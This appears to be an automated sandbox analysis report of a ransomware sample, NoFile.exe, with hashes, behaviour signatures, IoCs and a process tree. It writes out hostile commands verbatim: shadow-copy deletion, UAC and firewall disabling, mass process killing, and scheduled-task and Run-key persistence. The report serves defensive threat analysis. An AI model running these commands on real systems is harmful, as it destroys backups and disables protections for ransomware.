Analysis
- max time kernel: 150s
- max time network: 132s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 06-02-2022 09:18
Tasks
- Static task: static1
- Behavioral task: behavioral1 (Sample: NoFile.exe, Resource: win7-en-20211208)
- Behavioral task: behavioral2 (Sample: NoFile.exe, Resource: win10v2004-en-20220112)
General
- Target: NoFile.exe
- Size: 2.2MB
- MD5: 7d1ed67b77f47ba8aadf9a3ac7d0c371
- SHA1: a598e6708c189caeef1fa76064feb4d0155abb3d
- SHA256: 87300e6563c7ac9d8d758b219d135fb8b84a7788419a0ddd8c3470cc1e739eae
- SHA512: 17e468ba87f06c599b40b2dc8256bacfcfeb53cde8ac48b77d61f2c5a074b9cbe19e27e71029c67960d18af886813fc2c1b2b5afd89ae25147b179c233f120f9
Malware Config
Signatures
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies Windows Firewall (1 TTP)
- Drops startup file (2 IoCs)
  Processes: NoFile.exe
  - File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe (NoFile.exe)
  - File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe (NoFile.exe)
- Adds Run key to start application (2 TTPs, 4 IoCs)
  Processes: reg.exe, reg.exe
  - Key created: \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run (reg.exe)
  - Set value (str): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Machin_Update = "c:\\$Recycle.Bin\\RCRU_64.exe" (reg.exe)
  - Key created: \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run (reg.exe)
  - Set value (str): \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\Machin_Update = "c:\\$Recycle.Bin\\RCRU_64.exe" (reg.exe)
- Drops desktop.ini file(s) (2 IoCs)
  Processes: NoFile.exe
  - File opened for modification: \??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini (NoFile.exe)
  - File opened for modification: \??\c:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini (NoFile.exe)
- Enumerates connected drives (3 TTPs, 48 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: NoFile.exe
  - File opened (read-only) by NoFile.exe, one IoC per drive letter, in the order reported: \??\e:, \??\h:, \??\n:, \??\q:, \??\s:, \??\J:, \??\V:, \??\X:, \??\U:, \??\v:, \??\E:, \??\Z:, \??\y:, \??\R:, \??\T:, \??\a:, \??\p:, \??\t:, \??\F:, \??\L:, \??\O:, \??\x:, \??\i:, \??\r:, \??\H:, \??\b:, \??\f:, \??\S:, \??\Y:, \??\g:, \??\j:, \??\l:, \??\A:, \??\K:, \??\M:, \??\W:, \??\k:, \??\m:, \??\o:, \??\B:, \??\G:, \??\Q:, \??\u:, \??\w:, \??\z:, \??\I:, \??\N:, \??\P:
- Drops file in Program Files directory (64 IoCs)
  Processes: NoFile.exe (all entries below)
  - File opened for modification: \??\c:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(cm).wmf
  - File opened for modification: \??\c:\Program Files\Common Files\System\msadc\msdaremr.dll
  - File opened for modification: \??\c:\Program Files (x86)\Common Files\microsoft shared\Portal\PortalConnectCore.dll
  - File opened for modification: \??\c:\Program Files\VideoLAN\VLC\lua\http\dialogs\mosaic_window.html
  - File created: \??\c:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\js\Read_Me!_.txt
  - File opened for modification: \??\c:\Program Files\Microsoft Games\Hearts\de-DE\Hearts.exe.mui
  - File opened for modification: \??\c:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationRight_SelectionSubpicture.png
  - File opened for modification: \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF
  - File opened for modification: \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png
  - File opened for modification: \??\c:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\de\Microsoft.Build.Utilities.v3.5.resources.dll
  - File opened for modification: \??\c:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png
  - File opened for modification: \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar
  - File opened for modification: \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-javahelp.xml
  - File opened for modification: \??\c:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml
  - File created: \??\c:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BOLDSTRI\Read_Me!_.txt
  - File opened for modification: \??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.htm
  - File opened for modification: \??\c:\Program Files\Common Files\System\ado\fr-FR\msader15.dll.mui
  - File opened for modification: \??\c:\Program Files\VideoLAN\VLC\plugins\access\libvcd_plugin.dll
  - File opened for modification: \??\c:\Program Files\Common Files\Microsoft Shared\Filters\VISFILT.DLL
  - File opened for modification: \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-progress.xml
  - File opened for modification: \??\c:\Program Files\Java\jre7\lib\zi\SystemV\AST4
  - File opened for modification: \??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\5.png
  - File opened for modification: \??\c:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\LISTS\1033\PHONE.XML
  - File opened for modification: \??\c:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\SPRING.ELM
  - File created: \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\Read_Me!_.txt
  - File opened for modification: \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_zh_4.4.0.v20140623020002.jar
  - File opened for modification: \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml
  - File opened for modification: \??\c:\Program Files\Windows Media Player\es-ES\WMPMediaSharing.dll.mui
  - File opened for modification: \??\c:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_top_left.png
  - File opened for modification: \??\c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\JSByteCodeWin.bin
  - File opened for modification: \??\c:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2native.dll
  - File created: \??\c:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\css\Read_Me!_.txt
  - File opened for modification: \??\c:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\pkeyconfig.companion.dll
  - File opened for modification: \??\c:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Word.en-us\SETUP.XML
  - File created: \??\c:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\Read_Me!_.txt
  - File created: \??\c:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\Read_Me!_.txt
  - File opened for modification: \??\c:\Program Files\Java\jdk1.7.0_80\jre\bin\servertool.exe
  - File opened for modification: \??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunjce_provider.jar
  - File opened for modification: \??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vienna
  - File opened for modification: \??\c:\Program Files\Windows Photo Viewer\ImagingDevices.exe
  - File opened for modification: \??\c:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT
  - File opened for modification: \??\c:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationUp_ButtonGraphic.png
  - File opened for modification: \??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveDrop32x32.gif
  - File opened for modification: \??\c:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\ja\ReachFramework.resources.dll
  - File opened for modification: \??\c:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.AddIn.Contract.dll
  - File opened for modification: \??\c:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo
  - File opened for modification: \??\c:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB
  - File opened for modification: \??\c:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_ButtonGraphic.png
  - File opened for modification: \??\c:\Program Files\Java\jre7\lib\zi\Asia\Makassar
  - File opened for modification: \??\c:\Program Files\VideoLAN\VLC\plugins\d3d11\libdirect3d11_filters_plugin.dll
  - File opened for modification: \??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\21.png
  - File opened for modification: \??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent_partly-cloudy.png
  - File opened for modification: \??\c:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Updater.api
  - File opened for modification: \??\c:\Program Files\Common Files\Microsoft Shared\ink\it-IT\tipresx.dll.mui
  - File opened for modification: \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar
  - File opened for modification: \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_zh_CN.jar
  - File opened for modification: \??\c:\Program Files (x86)\Common Files\microsoft shared\ink\fr-FR\TipTsf.dll.mui
  - File opened for modification: \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar
  - File created: \??\c:\Program Files\Common Files\Microsoft Shared\OFFICE14\Read_Me!_.txt
  - File opened for modification: \??\c:\Program Files\DVD Maker\Shared\DvdStyles\Pets\rollinghills.png
  - File created: \??\c:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Read_Me!_.txt
  - File opened for modification: \??\c:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_fr.jar
  - File created: \??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\applet\Read_Me!_.txt
  - File opened for modification: \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml
- Drops file in Windows directory (2 IoCs)
  Processes: NoFile.exe
  - File created: C:\Windows\Pagesfilo.sys (NoFile.exe)
  - File opened for modification: C:\Windows\Pagesfilo.sys (NoFile.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Delays execution with timeout.exe (10 IoCs)
  Processes: timeout.exe (10 instances)
  - PIDs: 968, 672, 552, 1708, 688, 1588, 1740, 560, 1780, 1656
- Enumerates processes with tasklist (1 TTP, 11 IoCs)
  Processes: tasklist.exe (11 instances)
  - PIDs: 1928, 1872, 796, 1820, 1696, 968, 1396, 972, 632, 1060, 364
- Gathers system information (1 TTP, 2 IoCs)
  Runs systeminfo.exe.
  Processes: systeminfo.exe (2 instances)
  - PIDs: 964, 1160
- Interacts with shadow copies (2 TTPs, 2 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe (2 instances)
  - PIDs: 1260, 772
- Kills process with taskkill (40 IoCs)
  Processes: taskkill.exe (40 instances)
  - PIDs: 1520, 1780, 1552, 1984, 1664, 1364, 2020, 292, 1548, 920, 932, 268, 1924, 688, 1260, 1272, 1044, 1776, 1732, 1272, 1060, 624, 864, 1612, 1524, 316, 820, 964, 1244, 1728, 460, 2028, 580, 1696, 1740, 364, 1300, 1708, 1396, 560
- Modifies registry key (1 TTP, 3 IoCs)
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes: tasklist.exe, tasklist.exe, taskmgr.exe
  - 796 tasklist.exe (2 entries)
  - 632 tasklist.exe (2 entries)
  - 796 taskmgr.exe (60 entries)
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  Processes: taskmgr.exe
  - 796 taskmgr.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes: tasklist.exe, vssvc.exe, taskmgr.exe, WMIC.exe, taskkill.exe
  - Token SeDebugPrivilege: 796 tasklist.exe
  - Token SeDebugPrivilege: 632 tasklist.exe
  - Token SeBackupPrivilege: 2008 vssvc.exe
  - Token SeRestorePrivilege: 2008 vssvc.exe
  - Token SeAuditPrivilege: 2008 vssvc.exe
  - Token SeDebugPrivilege: 796 taskmgr.exe
  - Token SeDebugPrivilege: 1820 tasklist.exe
  - 460 WMIC.exe, the following sequence of 20 tokens reported twice (40 entries): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  - Token SeDebugPrivilege, taskkill.exe PIDs in the order reported: 1696, 1708, 1740, 316, 820, 364, 1396, 1364, 2020, 1244, 1552, 920
  - Token SeDebugPrivilege: 1696 tasklist.exe
  - Token SeDebugPrivilege, taskkill.exe PIDs: 932, 1272, 560, 1984
- Suspicious use of FindShellTrayWindow (64 IoCs)
  Processes: taskmgr.exe
  - 796 taskmgr.exe (64 entries)
- Suspicious use of SendNotifyMessage (64 IoCs)
  Processes: taskmgr.exe
  - 796 taskmgr.exe (64 entries)
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: NoFile.exe, cmd.exe, cmd.exe, cmd.exe, WScript.exe, cmd.exe, cmd.exe
  Each parent-to-target write below is reported four times (16 pairs, 64 entries):
  - PID 1604 NoFile.exe wrote to memory of 808 cmd.exe
  - PID 808 cmd.exe wrote to memory of 796 tasklist.exe
  - PID 808 cmd.exe wrote to memory of 1032 findstr.exe
  - PID 1604 NoFile.exe wrote to memory of 1796 cmd.exe
  - PID 1604 NoFile.exe wrote to memory of 1820 cmd.exe
  - PID 1820 cmd.exe wrote to memory of 580 WScript.exe
  - PID 1604 NoFile.exe wrote to memory of 268 cmd.exe
  - PID 268 cmd.exe wrote to memory of 560 schtasks.exe
  - PID 580 WScript.exe wrote to memory of 1624 cmd.exe
  - PID 580 WScript.exe wrote to memory of 832 cmd.exe
  - PID 832 cmd.exe wrote to memory of 632 tasklist.exe
  - PID 832 cmd.exe wrote to memory of 1176 find.exe
  - PID 1604 NoFile.exe wrote to memory of 1876 cmd.exe
  - PID 1876 cmd.exe wrote to memory of 1512 nslookup.exe
  - PID 832 cmd.exe wrote to memory of 1260 vssadmin.exe
  - PID 832 cmd.exe wrote to memory of 672 timeout.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\NoFile.exe"C:\Users\Admin\AppData\Local\Temp\NoFile.exe"1⤵
- Drops startup file
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist /v /fo csv3⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\findstr.exefindstr /i "dcdcf"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\h4_svc.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist /v5⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I /c "dcdcf"5⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet5⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\nslookup.exenslookup myip.opendns.com. resolver1.opendns.com3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo %date%-%time%2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"2⤵
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
-
C:\Windows\SysWOW64\find.exefind /i "os name"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "original"2⤵
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
-
C:\Windows\SysWOW64\find.exefind /i "original"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes2⤵
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- Modifies registry key
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall set rule group="Network Discovery" new enable=Yes3⤵
-
2⤵ C:\Windows\SysWOW64\cmd.exe
   C:\Windows\system32\cmd.exe /c taskkill /im notepad.exe&taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im notepad.exe
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im msftesql.exe
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im sqlagent.exe
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im sqlbrowser.exe
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im sqlservr.exe
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im sqlwriter.exe
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im oracle.exe
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im ocssd.exe
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im dbsnmp.exe
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im synctime.exe
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im agntsvc.exe
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im mydesktopqos.exe
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im isqlplussvc.exe
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im xfssvccon.exe
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im mydesktopservice.exe
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im ocautoupds.exe
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im agntsvc.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im encsvc.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im firefoxconfig.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im tbirdconfig.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im ocomm.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im mysqld.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im mysqld-nt.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im mysqld-opt.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im dbeng50.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im sqbcoreservice.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im excel.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im infopath.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im msaccess.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im mspub.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im onenote.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im outlook.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im powerpnt.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im steam.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im thebat.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im thebat64.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im thunderbird.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im visio.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im winword.exe
   - Kills process with taskkill

3⤵ C:\Windows\SysWOW64\taskkill.exe
   taskkill /im wordpad.exe
   - Kills process with taskkill
2⤵ C:\Windows\SysWOW64\cmd.exe
   C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f&reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f

3⤵ C:\Windows\SysWOW64\reg.exe
   reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f

3⤵ C:\Windows\SysWOW64\reg.exe
   reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
   - Modifies registry key

2⤵ C:\Windows\SysWOW64\cmd.exe
